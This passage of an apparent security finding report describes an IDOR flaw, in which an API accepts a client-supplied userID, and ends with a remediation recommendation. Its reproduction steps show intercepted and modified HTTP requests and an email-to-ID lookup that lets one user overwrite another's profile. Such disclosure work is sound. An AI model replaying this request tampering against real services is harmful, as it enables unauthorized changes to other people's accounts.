However, the backend failed to properly validate whether the userID provided in the request belonged to the authenticated session. As a result, an attacker could modify the profile details of any other user by replacing certain parameters in the HTTP request.
Additionally, an internal API endpoint exposed user identifiers when queried with an email address, making exploitation easier.
Steps to Reproduce
Log in using valid credentials:
Email: valid_user@example.com
Password: ********Navigate to:
Profile → Update
Step 2: Intercept the Update Request
Using an intercepting proxy tool, capture the profile update request.
Example intercepted request:
POST /api/v1/profile/update HTTP/1.1
Host: api.example.com
Authorization: Bearer REDACTED_TOKEN
Content-Type: application/json
{
"userID": "user_000123",
"email": "valid_user@example.com",
"firstName": "John",
"lastName": "Doe"
}Step 3: Retrieve Target User Identifier
An internal API endpoint allowed fetching user details by email.
POST https://api.example.com/v1/user/getByEmailRequest:
{
"email": "target_user@example.com"
}Response:
{
"userID": "user_000987",
"email": "target_user@example.com",
"role": "standard_user"
}Step 4: Modify the Update Request
Replace the authenticated user's userID and email with the target user's values:
{
"userID": "user_000987",
"email": "target_user@example.com",
"firstName": "Hacked",
"lastName": "User"
}Resend the request.
Step 5: Observe the Impact
The server processed the modified request successfully.
The profile details of target_user@example.com were updated without authorization.
This confirms a horizontal privilege escalation vulnerability caused by missing object-level authorization checks.
Recommendations
1. Enforce Strict Authorization Checks
Ensure the update endpoint validates:
request.userID == authenticated_userID_from_session_or_tokenThe server must derive identity from the session or JWT token — not from user-supplied input.